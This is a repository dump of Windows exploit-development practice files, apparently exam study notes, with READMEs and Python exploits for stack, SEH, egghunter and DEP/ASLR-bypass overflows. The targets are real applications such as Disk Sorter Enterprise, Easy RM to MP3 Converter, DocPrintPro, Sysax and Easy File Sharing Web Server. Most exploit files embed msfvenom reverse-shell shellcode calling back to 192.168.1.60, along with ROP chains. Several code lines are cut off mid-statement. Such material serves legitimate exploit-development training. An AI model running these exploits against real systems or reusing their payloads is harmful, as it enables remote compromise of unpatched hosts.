├── 1.stack_overflow ├── DiskSorterEnterprise_9.5.12 │ ├── README.md │ └── exploit.py ├── EasyRMtoMP3Converter │ ├── README.md │ └── exploit.py ├── README.md ├── brainpain │ ├── README.md │ ├── brainpan.exe │ └── exploit.py └── dostackbufferoverflowgood │ ├── README.md │ ├── dostackbufferoverflowgood.exe │ └── exploit.py ├── 2.seh-overflow ├── DocPrintPro_8.0 │ ├── README.md │ └── exploit.py ├── EFSEasyChatServer_3.1 │ ├── README.md │ └── exploit.py ├── EasyFileSharingWebServer_7.2 │ ├── README.md │ └── exploit.py ├── README.md └── vulnserver-GMON │ ├── README.md │ ├── exploit.py │ └── vulnserver.exe ├── 3.egghunter ├── README.md ├── Sysax_5.53 │ ├── README.md │ └── exploit.py ├── TFTPServer_1.4 │ ├── README.md │ └── exploit.py ├── Vulnserver_GMON │ ├── README.md │ └── exploit.py ├── Vulnserver_KSTET │ ├── README.md │ └── exploit.py └── freeFTPd_1.0.10 │ ├── README.md │ └── exploit.py ├── 5.dep_bypass ├── CloudMe_1.11.2 │ ├── README.md │ ├── exploit.py │ ├── exploit_virtualalloc.py │ └── exploit_wpm.py ├── Disk_Sorter_Enterprise_9.5.12 │ └── exploit_virtualalloc.py ├── EasyFileSharingWebServer_7.2 │ ├── README.md │ ├── exploit_virtualprotect.py │ └── exploit_wpm.py ├── EasyRMtoMp3_2.7.3.700 │ ├── README.md │ └── exploit.py ├── Mini-streamRM-MP3Converter_3.1.2.1 │ ├── README.md │ └── exploit.py ├── README.md ├── VUPlayer_2.49 │ ├── README.md │ └── exploit_virtualprotect.py └── Vulnserver_TRUN │ ├── README.md │ ├── exploit.py │ └── exploit2.py ├── 6.asrl_enabled ├── Easy File Sharing_7.2 │ ├── README.md │ └── exploit.py ├── QuoteDB │ ├── README.md │ └── exploit.py ├── README.md ├── Rainbow2 │ ├── README.md │ └── exploit_wpm.py ├── Sync_Breeze_version_10.0.28 │ ├── README.md │ ├── exploit.py │ └── exploit_with_writeprocessmemory.py └── custom │ ├── README.md │ ├── exploit_wpm.py │ └── server.exe ├── 7.format_strings └── README.md └── README.md /1.stack_overflow/DiskSorterEnterprise_9.5.12/README.md: -------------------------------------------------------------------------------- 1 | # DiskSorterEnterprise_9.5.12 2 | Downloaded from: https://www.exploit-db.com/exploits/41771 3 | 4 | Vulnerable function: Command -> Import Command 5 | 6 | ## Initial Crash 7 | ```py 8 | import os,struct 9 | 10 | CRASH_LEN = 5000 # change me 11 | 12 | payload = "A" * CRASH_LEN 13 | 14 | #FILE 15 | file='\n' 16 | 17 | f = open('Exploit.xml', 'w') 18 | f.write(file) 19 | f.close() 20 | ``` 21 | -------------------------------------------------------------------------------- /1.stack_overflow/DiskSorterEnterprise_9.5.12/exploit.py: -------------------------------------------------------------------------------- 1 | import os,struct 2 | 3 | CRASH_LEN = 5000 # change me 4 | OFFSET = 1536 5 | 6 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x27' EXITFUNC=thread 7 | shellcode = b"" 8 | shellcode += b"\xb8\x73\x01\x43\xaf\xda\xd0\xd9\x74\x24\xf4" 9 | shellcode += b"\x5f\x29\xc9\xb1\x52\x83\xef\xfc\x31\x47\x0e" 10 | shellcode += b"\x03\x34\x0f\xa1\x5a\x46\xe7\xa7\xa5\xb6\xf8" 11 | shellcode += b"\xc7\x2c\x53\xc9\xc7\x4b\x10\x7a\xf8\x18\x74" 12 | shellcode += b"\x77\x73\x4c\x6c\x0c\xf1\x59\x83\xa5\xbc\xbf" 13 | shellcode += b"\xaa\x36\xec\xfc\xad\xb4\xef\xd0\x0d\x84\x3f" 14 | shellcode += b"\x25\x4c\xc1\x22\xc4\x1c\x9a\x29\x7b\xb0\xaf" 15 | shellcode += b"\x64\x40\x3b\xe3\x69\xc0\xd8\xb4\x88\xe1\x4f" 16 | shellcode += b"\xce\xd2\x21\x6e\x03\x6f\x68\x68\x40\x4a\x22" 17 | shellcode += b"\x03\xb2\x20\xb5\xc5\x8a\xc9\x1a\x28\x23\x38" 18 | shellcode += b"\x62\x6d\x84\xa3\x11\x87\xf6\x5e\x22\x5c\x84" 19 | shellcode += b"\x84\xa7\x46\x2e\x4e\x1f\xa2\xce\x83\xc6\x21" 20 | shellcode += b"\xdc\x68\x8c\x6d\xc1\x6f\x41\x06\xfd\xe4\x64" 21 | shellcode += b"\xc8\x77\xbe\x42\xcc\xdc\x64\xea\x55\xb9\xcb" 22 | shellcode += b"\x13\x85\x62\xb3\xb1\xce\x8f\xa0\xcb\x8d\xc7" 23 | shellcode += b"\x05\xe6\x2d\x18\x02\x71\x5e\x2a\x8d\x29\xc8" 24 | shellcode += b"\x06\x46\xf4\x0f\x68\x7d\x40\x9f\x97\x7e\xb1" 25 | shellcode += b"\xb6\x53\x2a\xe1\xa0\x72\x53\x6a\x30\x7a\x86" 26 | shellcode += b"\x3d\x60\xd4\x79\xfe\xd0\x94\x29\x96\x3a\x1b" 27 | shellcode += b"\x15\x86\x45\xf1\x3e\x2d\xbc\x92\x80\x1a\xbf" 28 | shellcode += b"\x5e\x69\x59\xbf\x84\xec\xd4\x59\xd2\xfe\xb0" 29 | shellcode += b"\xf2\x4b\x66\x99\x88\xea\x67\x37\xf5\x2d\xe3" 30 | shellcode += b"\xb4\x0a\xe3\x04\xb0\x18\x94\xe4\x8f\x42\x33" 31 | shellcode += b"\xfa\x25\xea\xdf\x69\xa2\xea\x96\x91\x7d\xbd" 32 | shellcode += b"\xff\x64\x74\x2b\x12\xde\x2e\x49\xef\x86\x09" 33 | shellcode += b"\xc9\x34\x7b\x97\xd0\xb9\xc7\xb3\xc2\x07\xc7" 34 | shellcode += b"\xff\xb6\xd7\x9e\xa9\x60\x9e\x48\x18\xda\x48" 35 | shellcode += b"\x26\xf2\x8a\x0d\x04\xc5\xcc\x11\x41\xb3\x30" 36 | shellcode += b"\xa3\x3c\x82\x4f\x0c\xa9\x02\x28\x70\x49\xec" 37 | shellcode += b"\xe3\x30\x69\x0f\x21\x4d\x02\x96\xa0\xec\x4f" 38 | shellcode += b"\x29\x1f\x32\x76\xaa\x95\xcb\x8d\xb2\xdc\xce" 39 | shellcode += b"\xca\x74\x0d\xa3\x43\x11\x31\x10\x63\x30" 40 | 41 | payload = b"A" * 1536 42 | payload += struct.pack("\n' 51 | 52 | f = open('Exploit.xml', 'wb') 53 | f.write(file) 54 | f.close() 55 | -------------------------------------------------------------------------------- /1.stack_overflow/EasyRMtoMP3Converter/README.md: -------------------------------------------------------------------------------- 1 | # EasyRMtoMP3Converter 2 | 3 | Downloaded from: https://www.exploit-db.com/exploits/10374 4 | 5 | ## Initial Crash 6 | 7 | ```py 8 | #!/usr/bin/python 9 | 10 | file = "crash1.m3u" 11 | f = open(file , "w") 12 | 13 | CRASH_LEN = 30000 # change me 14 | 15 | junk = "A" * CRASH_LEN 16 | f.write(junk) 17 | f.close() 18 | ``` 19 | -------------------------------------------------------------------------------- /1.stack_overflow/EasyRMtoMP3Converter/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import struct 3 | 4 | file = "crash1.m3u" 5 | f = open(file , "wb") 6 | 7 | CRASH_LEN = 30000 # change me 8 | 9 | #\x00\x09\x0a 10 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x09\x0a' EXITFUNC=thread 11 | shellcode = b"" 12 | shellcode += b"\xba\xfc\xc7\xd1\xe3\xdb\xdc\xd9\x74\x24\xf4" 13 | shellcode += b"\x5d\x29\xc9\xb1\x52\x83\xed\xfc\x31\x55\x0e" 14 | shellcode += b"\x03\xa9\xc9\x33\x16\xad\x3e\x31\xd9\x4d\xbf" 15 | shellcode += b"\x56\x53\xa8\x8e\x56\x07\xb9\xa1\x66\x43\xef" 16 | shellcode += b"\x4d\x0c\x01\x1b\xc5\x60\x8e\x2c\x6e\xce\xe8" 17 | shellcode += b"\x03\x6f\x63\xc8\x02\xf3\x7e\x1d\xe4\xca\xb0" 18 | shellcode += b"\x50\xe5\x0b\xac\x99\xb7\xc4\xba\x0c\x27\x60" 19 | shellcode += b"\xf6\x8c\xcc\x3a\x16\x95\x31\x8a\x19\xb4\xe4" 20 | shellcode += b"\x80\x43\x16\x07\x44\xf8\x1f\x1f\x89\xc5\xd6" 21 | shellcode += b"\x94\x79\xb1\xe8\x7c\xb0\x3a\x46\x41\x7c\xc9" 22 | shellcode += b"\x96\x86\xbb\x32\xed\xfe\xbf\xcf\xf6\xc5\xc2" 23 | shellcode += b"\x0b\x72\xdd\x65\xdf\x24\x39\x97\x0c\xb2\xca" 24 | shellcode += b"\x9b\xf9\xb0\x94\xbf\xfc\x15\xaf\xc4\x75\x98" 25 | shellcode += b"\x7f\x4d\xcd\xbf\x5b\x15\x95\xde\xfa\xf3\x78" 26 | shellcode += b"\xde\x1c\x5c\x24\x7a\x57\x71\x31\xf7\x3a\x1e" 27 | shellcode += b"\xf6\x3a\xc4\xde\x90\x4d\xb7\xec\x3f\xe6\x5f" 28 | shellcode += b"\x5d\xb7\x20\x98\xa2\xe2\x95\x36\x5d\x0d\xe6" 29 | shellcode += b"\x1f\x9a\x59\xb6\x37\x0b\xe2\x5d\xc7\xb4\x37" 30 | shellcode += b"\xf1\x97\x1a\xe8\xb2\x47\xdb\x58\x5b\x8d\xd4" 31 | shellcode += b"\x87\x7b\xae\x3e\xa0\x16\x55\xa9\x0f\x4e\x54" 32 | shellcode += b"\x15\xf8\x8d\x56\x7f\x7d\x18\xb0\x15\x6d\x4d" 33 | shellcode += b"\x6b\x82\x14\xd4\xe7\x33\xd8\xc2\x82\x74\x52" 34 | shellcode += b"\xe1\x73\x3a\x93\x8c\x67\xab\x53\xdb\xd5\x7a" 35 | shellcode += b"\x6b\xf1\x71\xe0\xfe\x9e\x81\x6f\xe3\x08\xd6" 36 | shellcode += b"\x38\xd5\x40\xb2\xd4\x4c\xfb\xa0\x24\x08\xc4" 37 | shellcode += b"\x60\xf3\xe9\xcb\x69\x76\x55\xe8\x79\x4e\x56" 38 | shellcode += b"\xb4\x2d\x1e\x01\x62\x9b\xd8\xfb\xc4\x75\xb3" 39 | shellcode += b"\x50\x8f\x11\x42\x9b\x10\x67\x4b\xf6\xe6\x87" 40 | shellcode += b"\xfa\xaf\xbe\xb8\x33\x38\x37\xc1\x29\xd8\xb8" 41 | shellcode += b"\x18\xea\xf8\x5a\x88\x07\x91\xc2\x59\xaa\xfc" 42 | shellcode += b"\xf4\xb4\xe9\xf8\x76\x3c\x92\xfe\x67\x35\x97" 43 | shellcode += b"\xbb\x2f\xa6\xe5\xd4\xc5\xc8\x5a\xd4\xcf" 44 | 45 | payload = b"A" * 26043 46 | payload += struct.pack(" Add URL 6 | 7 | ## Initial Crash 8 | ```py 9 | #!/usr/bin/python 10 | 11 | file = "file.txt" 12 | f = open(file , "w") 13 | 14 | CRASH_LEN = 10000 # change me 15 | 16 | junk = "A" * CRASH_LEN 17 | f.write(junk) 18 | f.close() 19 | ``` 20 | -------------------------------------------------------------------------------- /2.seh-overflow/DocPrintPro_8.0/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import struct 3 | 4 | file = "file.txt" 5 | f = open(file , "wb") 6 | 7 | CRASH_LEN = 10000 # change me 8 | OFFSET = 3876 9 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f' EXITFUNC=thread 10 | shellcode = b"" 11 | shellcode += b"\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81" 12 | shellcode += b"\x73\x13\xbc\x93\x25\x97\x83\xeb\xfc\xe2\xf4" 13 | shellcode += b"\x40\x7b\xa7\x97\xbc\x93\x45\x1e\x59\xa2\xe5" 14 | shellcode += b"\xf3\x37\xc3\x15\x1c\xee\x9f\xae\xc5\xa8\x18" 15 | shellcode += b"\x57\xbf\xb3\x24\x6f\xb1\x8d\x6c\x89\xab\xdd" 16 | shellcode += b"\xef\x27\xbb\x9c\x52\xea\x9a\xbd\x54\xc7\x65" 17 | shellcode += b"\xee\xc4\xae\xc5\xac\x18\x6f\xab\x37\xdf\x34" 18 | shellcode += b"\xef\x5f\xdb\x24\x46\xed\x18\x7c\xb7\xbd\x40" 19 | shellcode += b"\xae\xde\xa4\x70\x1f\xde\x37\xa7\xae\x96\x6a" 20 | shellcode += b"\xa2\xda\x3b\x7d\x5c\x28\x96\x7b\xab\xc5\xe2" 21 | shellcode += b"\x4a\x90\x58\x6f\x87\xee\x01\xe2\x58\xcb\xae" 22 | shellcode += b"\xcf\x98\x92\xf6\xf1\x37\x9f\x6e\x1c\xe4\x8f" 23 | shellcode += b"\x24\x44\x37\x97\xae\x96\x6c\x1a\x61\xb3\x98" 24 | shellcode += b"\xc8\x7e\xf6\xe5\xc9\x74\x68\x5c\xcc\x7a\xcd" 25 | shellcode += b"\x37\x81\xce\x1a\xe1\xfb\x16\xa5\xbc\x93\x4d" 26 | shellcode += b"\xe0\xcf\xa1\x7a\xc3\xd4\xdf\x52\xb1\xbb\x6c" 27 | shellcode += b"\xf0\x2f\x2c\x92\x25\x97\x95\x57\x71\xc7\xd4" 28 | shellcode += b"\xba\xa5\xfc\xbc\x6c\xf0\xc7\xec\xc3\x75\xd7" 29 | shellcode += b"\xec\xd3\x75\xff\x56\x9c\xfa\x77\x43\x46\xb2" 30 | shellcode += b"\xfd\xb9\xfb\xe5\x3f\xbd\xaf\x4d\x95\xbc\x89" 31 | shellcode += b"\xa0\x1e\x5a\xf9\x35\xc1\xeb\xfb\xbc\x32\xc8" 32 | shellcode += b"\xf2\xda\x42\x39\x53\x51\x9b\x43\xdd\x2d\xe2" 33 | shellcode += b"\x50\xfb\xd5\x22\x1e\xc5\xda\x42\xd4\xf0\x48" 34 | shellcode += b"\xf3\xbc\x1a\xc6\xc0\xeb\xc4\x14\x61\xd6\x81" 35 | shellcode += b"\x7c\xc1\x5e\x6e\x43\x50\xf8\xb7\x19\x96\xbd" 36 | shellcode += b"\x1e\x61\xb3\xac\x55\x25\xd3\xe8\xc3\x73\xc1" 37 | shellcode += b"\xea\xd5\x73\xd9\xea\xc5\x76\xc1\xd4\xea\xe9" 38 | shellcode += b"\xa8\x3a\x6c\xf0\x1e\x5c\xdd\x73\xd1\x43\xa3" 39 | shellcode += b"\x4d\x9f\x3b\x8e\x45\x68\x69\x28\xc5\x8a\x96" 40 | shellcode += b"\x99\x4d\x31\x29\x2e\xb8\x68\x69\xaf\x23\xeb" 41 | shellcode += b"\xb6\x13\xde\x77\xc9\x96\x9e\xd0\xaf\xe1\x4a" 42 | shellcode += b"\xfd\xbc\xc0\xda\x42" 43 | 44 | 45 | payload = b"A" * OFFSET 46 | payload += struct.pack(" !teb 25 | TEB at 002e3000 26 | ExceptionList: 00edec94 27 | StackBase: 00ee0000 28 | StackLimit: 00edd000 29 | SubSystemTib: 00000000 30 | FiberData: 00001e00 31 | ArbitraryUserPointer: 00000000 32 | Self: 002e3000 33 | EnvironmentPointer: 00000000 34 | ClientId: 0000196c . 000021bc 35 | RpcHandle: 00000000 36 | Tls Storage: 007f02b0 37 | PEB Address: 002df000 38 | LastErrorValue: 0 39 | LastStatusValue: c000000d 40 | Count Owned Locks: 0 41 | HardErrorMode: 0 42 | ``` 43 | And now you dump the \_EXCEPTION_REGISTRATION_RECORD to find NSEH 44 | ```py 45 | 0:003> dt _EXCEPTION_REGISTRATION_RECORD 00edec94 46 | ntdll!_EXCEPTION_REGISTRATION_RECORD 47 | +0x000 Next : 0x00edffcc _EXCEPTION_REGISTRATION_RECORD 48 | +0x004 Handler : 0x77ec5b10 _EXCEPTION_DISPOSITION ntdll!ExecuteHandler2+0 49 | 50 | 0:003> db 0x00edffcc 51 | 00edffcc 42 42 42 42 43 43 43 43-01 02 03 04 05 06 07 08 BBBBCCCC........ 52 | 00edffdc 09 0a 0b 0c 0d 0e 0f 10-11 12 13 14 15 16 17 18 ................ 53 | 00edffec 19 1a 1b 1c 1d 1e 1f 20-21 22 23 24 25 26 27 28 ....... !"#$%&'( 54 | 00edfffc 29 2a 2b 2c ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? )*+,?? 55 | ``` 56 | 4. Find a PPR with mona and insert in the SEH 57 | ```py 58 | !py mona seh -cpb '\x00' 59 | ``` 60 | 1. If you find it, go to 5. 61 | 2. Otherwise search for ADD ESP,XX 62 | 2. If you have only NULL byte, read here https://dl.packetstormsecurity.net/papers/bypass/bypassing-nullbyte.pdf 63 | 64 | 5. Overwrite NSEH with a short jump 65 | ```py 66 | nasm > jmp short 8 67 | 00000000 EB06 68 | ``` 69 | 6. Now look if you have space for the shellcode 70 | 1. If you have it, insert the shellcode and pop the calc 71 | ```py 72 | crash = b"A"*junk 73 | nSEH = b"\xeb\x06\x90\x90" #jump 8 bytes 74 | SEH = struct.pack(" add sp, 0x86c 88 | 00000000 6681C46C08 add sp,0x86c 89 | 90 | 91 | inputBuffer = b"A" * 124 92 | inputBuffer+= pack(" push esp 103 | \x54 104 | nasm > pop eax 105 | \x58 106 | nasm > add ax, 0x5bd 107 | 00000000 6605BD05 add ax,0x5bd 108 | nasm > jmp eax 109 | \xff\xe0 110 | 111 | buffer = shellcode 112 | buffer += b"A"*(2495-len(shellcode)) 113 | buffer += b"\xeb\x06\x90\x90" #nseh 114 | buffer += pack(" jmp 0x6 ; nop ; nop (jump over eip into short shellcode part below) 123 | buf += pack(" pop ecx ; pop ecx ; ret 124 | buf += b"\xb8\xc0\xf8\xff\xff" # mov eax, 0xfffff8c0 (redirect execution to top of buffer [shellcode]) 125 | buf += b"\xf7\xd8" # neg eax 126 | buf += b"\x01\xc4" # add esp, eax 127 | buf += b"\xff\xe4" # jmp esp 128 | buf += b"C" * 33 # required to trigger the seh overwrite rather than another crash 129 | ``` 130 | 131 | ## Resources 132 | 1. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ 133 | 2. https://epi052.gitlab.io/notes-to-self/blog/2020-05-18-osce-exam-practice-part-three/ 134 | 3. https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/seh-based-buffer-overflow 135 | 4. https://fuzzysecurity.com/tutorials/expDev/3.html 136 | -------------------------------------------------------------------------------- /2.seh-overflow/vulnserver-GMON/README.md: -------------------------------------------------------------------------------- 1 | # Vulnserver - GMON Command 2 | 3 | ## Initial Crash 4 | 5 | ```py 6 | import struct 7 | import socket 8 | 9 | 10 | TARGET_IP = "127.0.0.1" 11 | TARGET_PORT = 9999 12 | target = (TARGET_IP, TARGET_PORT) 13 | 14 | 15 | VULNSRVR_CMD = b"GMON /.../" # change me 16 | CRASH_LEN = 5011 # change me 17 | 18 | payload = VULNSRVR_CMD 19 | payload += b"A" * CRASH_LEN 20 | 21 | with socket.create_connection(target) as sock: 22 | sock.recv(512) 23 | 24 | sent = sock.send(payload) 25 | print(f"sent {sent} bytes") 26 | ``` 27 | -------------------------------------------------------------------------------- /2.seh-overflow/vulnserver-GMON/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import socket 3 | 4 | 5 | TARGET_IP = "127.0.0.1" 6 | TARGET_PORT = 9999 7 | target = (TARGET_IP, TARGET_PORT) 8 | 9 | 10 | VULNSRVR_CMD = b"GMON /.../" # change me 11 | CRASH_LEN = 5011 # change me 12 | OFFSET = 3546 13 | 14 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00' EXITFUNC=thread 15 | 16 | shellcode = b"" 17 | shellcode += b"\xba\xfc\xc7\xd1\xe3\xdb\xdc\xd9\x74\x24\xf4" 18 | shellcode += b"\x5d\x29\xc9\xb1\x52\x83\xed\xfc\x31\x55\x0e" 19 | shellcode += b"\x03\xa9\xc9\x33\x16\xad\x3e\x31\xd9\x4d\xbf" 20 | shellcode += b"\x56\x53\xa8\x8e\x56\x07\xb9\xa1\x66\x43\xef" 21 | shellcode += b"\x4d\x0c\x01\x1b\xc5\x60\x8e\x2c\x6e\xce\xe8" 22 | shellcode += b"\x03\x6f\x63\xc8\x02\xf3\x7e\x1d\xe4\xca\xb0" 23 | shellcode += b"\x50\xe5\x0b\xac\x99\xb7\xc4\xba\x0c\x27\x60" 24 | shellcode += b"\xf6\x8c\xcc\x3a\x16\x95\x31\x8a\x19\xb4\xe4" 25 | shellcode += b"\x80\x43\x16\x07\x44\xf8\x1f\x1f\x89\xc5\xd6" 26 | shellcode += b"\x94\x79\xb1\xe8\x7c\xb0\x3a\x46\x41\x7c\xc9" 27 | shellcode += b"\x96\x86\xbb\x32\xed\xfe\xbf\xcf\xf6\xc5\xc2" 28 | shellcode += b"\x0b\x72\xdd\x65\xdf\x24\x39\x97\x0c\xb2\xca" 29 | shellcode += b"\x9b\xf9\xb0\x94\xbf\xfc\x15\xaf\xc4\x75\x98" 30 | shellcode += b"\x7f\x4d\xcd\xbf\x5b\x15\x95\xde\xfa\xf3\x78" 31 | shellcode += b"\xde\x1c\x5c\x24\x7a\x57\x71\x31\xf7\x3a\x1e" 32 | shellcode += b"\xf6\x3a\xc4\xde\x90\x4d\xb7\xec\x3f\xe6\x5f" 33 | shellcode += b"\x5d\xb7\x20\x98\xa2\xe2\x95\x36\x5d\x0d\xe6" 34 | shellcode += b"\x1f\x9a\x59\xb6\x37\x0b\xe2\x5d\xc7\xb4\x37" 35 | shellcode += b"\xf1\x97\x1a\xe8\xb2\x47\xdb\x58\x5b\x8d\xd4" 36 | shellcode += b"\x87\x7b\xae\x3e\xa0\x16\x55\xa9\x0f\x4e\x54" 37 | shellcode += b"\x15\xf8\x8d\x56\x7f\x7d\x18\xb0\x15\x6d\x4d" 38 | shellcode += b"\x6b\x82\x14\xd4\xe7\x33\xd8\xc2\x82\x74\x52" 39 | shellcode += b"\xe1\x73\x3a\x93\x8c\x67\xab\x53\xdb\xd5\x7a" 40 | shellcode += b"\x6b\xf1\x71\xe0\xfe\x9e\x81\x6f\xe3\x08\xd6" 41 | shellcode += b"\x38\xd5\x40\xb2\xd4\x4c\xfb\xa0\x24\x08\xc4" 42 | shellcode += b"\x60\xf3\xe9\xcb\x69\x76\x55\xe8\x79\x4e\x56" 43 | shellcode += b"\xb4\x2d\x1e\x01\x62\x9b\xd8\xfb\xc4\x75\xb3" 44 | shellcode += b"\x50\x8f\x11\x42\x9b\x10\x67\x4b\xf6\xe6\x87" 45 | shellcode += b"\xfa\xaf\xbe\xb8\x33\x38\x37\xc1\x29\xd8\xb8" 46 | shellcode += b"\x18\xea\xf8\x5a\x88\x07\x91\xc2\x59\xaa\xfc" 47 | shellcode += b"\xf4\xb4\xe9\xf8\x76\x3c\x92\xfe\x67\x35\x97" 48 | shellcode += b"\xbb\x2f\xa6\xe5\xd4\xc5\xc8\x5a\xd4\xcf" 49 | 50 | payload = VULNSRVR_CMD 51 | payload += shellcode 52 | payload += b"A" * (OFFSET - len(shellcode)) 53 | payload += struct.pack(" Enable SSH port 5 | 6 | ## Initial Crash 7 | ```py 8 | import paramiko,os,sys 9 | 10 | TARGET_IP = "127.0.0.1" 11 | TARGET_PORT = 22 12 | target = (TARGET_IP, TARGET_PORT) 13 | 14 | CRASH_LEN = 10000 # change me 15 | 16 | payload = b"A" * CRASH_LEN 17 | 18 | transport = paramiko.Transport(target) 19 | transport.connect(username = payload, password = "test") 20 | transport.close() 21 | ``` 22 | -------------------------------------------------------------------------------- /3.egghunter/Sysax_5.53/exploit.py: -------------------------------------------------------------------------------- 1 | import paramiko,os,sys 2 | import struct 3 | 4 | TARGET_IP = "127.0.0.1" 5 | TARGET_PORT = 22 6 | target = (TARGET_IP, TARGET_PORT) 7 | 8 | #\x00\x3a 9 | 10 | CRASH_LEN = 10000 # change me 11 | OFFSET = 9208 # 5000 + 4208 12 | 13 | egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x63\x30\x64\x33\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7" 14 | 15 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x3a' EXITFUNC=thread 16 | shellcode = b"" 17 | shellcode += b"\xdb\xd1\xb8\x8f\x2f\xfe\x3d\xd9\x74\x24\xf4" 18 | shellcode += b"\x5a\x31\xc9\xb1\x52\x31\x42\x17\x83\xc2\x04" 19 | shellcode += b"\x03\xcd\x3c\x1c\xc8\x2d\xaa\x62\x33\xcd\x2b" 20 | shellcode += b"\x03\xbd\x28\x1a\x03\xd9\x39\x0d\xb3\xa9\x6f" 21 | shellcode += b"\xa2\x38\xff\x9b\x31\x4c\x28\xac\xf2\xfb\x0e" 22 | shellcode += b"\x83\x03\x57\x72\x82\x87\xaa\xa7\x64\xb9\x64" 23 | shellcode += b"\xba\x65\xfe\x99\x37\x37\x57\xd5\xea\xa7\xdc" 24 | shellcode += b"\xa3\x36\x4c\xae\x22\x3f\xb1\x67\x44\x6e\x64" 25 | shellcode += b"\xf3\x1f\xb0\x87\xd0\x2b\xf9\x9f\x35\x11\xb3" 26 | shellcode += b"\x14\x8d\xed\x42\xfc\xdf\x0e\xe8\xc1\xef\xfc" 27 | shellcode += b"\xf0\x06\xd7\x1e\x87\x7e\x2b\xa2\x90\x45\x51" 28 | shellcode += b"\x78\x14\x5d\xf1\x0b\x8e\xb9\x03\xdf\x49\x4a" 29 | shellcode += b"\x0f\x94\x1e\x14\x0c\x2b\xf2\x2f\x28\xa0\xf5" 30 | shellcode += b"\xff\xb8\xf2\xd1\xdb\xe1\xa1\x78\x7a\x4c\x07" 31 | shellcode += b"\x84\x9c\x2f\xf8\x20\xd7\xc2\xed\x58\xba\x8a" 32 | shellcode += b"\xc2\x50\x44\x4b\x4d\xe2\x37\x79\xd2\x58\xdf" 33 | shellcode += b"\x31\x9b\x46\x18\x35\xb6\x3f\xb6\xc8\x39\x40" 34 | shellcode += b"\x9f\x0e\x6d\x10\xb7\xa7\x0e\xfb\x47\x47\xdb" 35 | shellcode += b"\xac\x17\xe7\xb4\x0c\xc7\x47\x65\xe5\x0d\x48" 36 | shellcode += b"\x5a\x15\x2e\x82\xf3\xbc\xd5\x45\x3c\xe8\xd4" 37 | shellcode += b"\xa9\xd4\xeb\xd6\xcb\xa1\x65\x30\x81\xb9\x23" 38 | shellcode += b"\xeb\x3e\x23\x6e\x67\xde\xac\xa4\x02\xe0\x27" 39 | shellcode += b"\x4b\xf3\xaf\xcf\x26\xe7\x58\x20\x7d\x55\xce" 40 | shellcode += b"\x3f\xab\xf1\x8c\xd2\x30\x01\xda\xce\xee\x56" 41 | shellcode += b"\x8b\x21\xe7\x32\x21\x1b\x51\x20\xb8\xfd\x9a" 42 | shellcode += b"\xe0\x67\x3e\x24\xe9\xea\x7a\x02\xf9\x32\x82" 43 | shellcode += b"\x0e\xad\xea\xd5\xd8\x1b\x4d\x8c\xaa\xf5\x07" 44 | shellcode += b"\x63\x65\x91\xde\x4f\xb6\xe7\xde\x85\x40\x07" 45 | shellcode += b"\x6e\x70\x15\x38\x5f\x14\x91\x41\xbd\x84\x5e" 46 | shellcode += b"\x98\x05\xa4\xbc\x08\x70\x4d\x19\xd9\x39\x10" 47 | shellcode += b"\x9a\x34\x7d\x2d\x19\xbc\xfe\xca\x01\xb5\xfb" 48 | shellcode += b"\x97\x85\x26\x76\x87\x63\x48\x25\xa8\xa1" 49 | 50 | payload = b"c0d3c0d3" #8 bytes 51 | payload += shellcode 52 | payload += b"A" * (OFFSET - 100 - 8 - len(shellcode)) 53 | payload += b"\x90" * (100 - len(egghunter)) 54 | payload += egghunter 55 | payload += struct.pack(" 1000 74 | edx += rop_nop 75 | edx += rop_nop 76 | edx += rop_nop 77 | edx += rop_nop 78 | 79 | 80 | #EBX {DONE} - 81 | ebx = pack("\n' 144 | 145 | f = open('Exploit.xml', 'wb') 146 | f.write(file) 147 | f.close() 148 | -------------------------------------------------------------------------------- /5.dep_bypass/EasyFileSharingWebServer_7.2/README.md: -------------------------------------------------------------------------------- 1 | # Easy File Sharing Web Server 7.2 - DEP Enabled manually 2 | 3 | Downloaded from: https://www.exploit-db.com/exploits/44522 4 | 5 | ## Initial Crash 6 | ```py 7 | import socket 8 | import os 9 | import sys 10 | import struct 11 | 12 | ip = "127.0.0.1" 13 | port = 80 14 | 15 | #\x0a\x0d\x20\x25\x2f\x5c 16 | 17 | CRASH_LEN = 5000 # change me 18 | OFFSET = 4061 # change me 19 | 20 | payload = b"A" * OFFSET 21 | payload += struct.pack(" Nop -V 15 | #ECX => lpflOldProtect - 61c804f0 - V 16 | #EDX 00000040 => flNewProtect - V 17 | #EBX 00000201 => dwSize 512 - V 18 | #ESP ???????? => Leave as is 19 | #EBP ???????? => Call to ESP (jmp, call, push,..) -> !py mona jmp -r esp -cpb '\x00\x0a\x0d\x20\x25\x2f\x5c' 20 | #ESI ???????? => PTR to VirtualProtect - DWORD PTR of VirtualProtect 21 | #EDI RETN => ROP-Nop same as EIP --> !py mona find -type instr -s "retn" -m modulo.dll -cpb "\x00" 22 | 23 | CRASH_LEN = 5000 # change me 24 | OFFSET = 4061 # change me 25 | 26 | rop_nop = struct.pack(" u poi(0x61C832D0)+0001b030 = KERNEL32!WriteProcessMemoryStub 35 | # kernel32!WriteProcessMemory placeholder parameters 36 | rop += struct.pack(' saving eax in ebp 61 | rop += struct.pack(' [EDI] 141 | payload += struct.pack(" [ECX] 146 | payload += struct.pack(" [ECX] 168 | payload += 